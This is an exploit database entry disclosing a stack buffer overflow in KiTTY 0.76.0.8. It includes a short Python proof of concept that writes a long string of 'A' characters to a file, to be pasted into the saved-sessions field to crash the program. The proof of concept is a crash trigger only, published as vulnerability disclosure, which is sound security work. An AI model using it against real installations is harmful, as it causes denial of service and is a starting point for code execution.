Kitty 0.76.0.8 Stack Buffer Overflow

2022.06.20
Credit: Yehia Elghaly
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow # Discovered by: Yehia Elghaly # Discovered Date: 2022-06-08 # Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md # Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe # Tested Version: 0.76.0.8 # Vulnerability Type: Buffer Overflow # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Kitty 0.76.0.8 Stack Buffer Overflow # Steps to reproduce: # 1. - Run the python script and it will create exploit.txt file. # 3. - Kitty 0.76.0.8 # 4. - Sessions -> Save # 5. - Paste the characters of txt to Saved/Sessions then click save # 6. - Crashed # Note: ECX Overwwrite #!/usr/bin/python exploit = 'A' * 2091 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top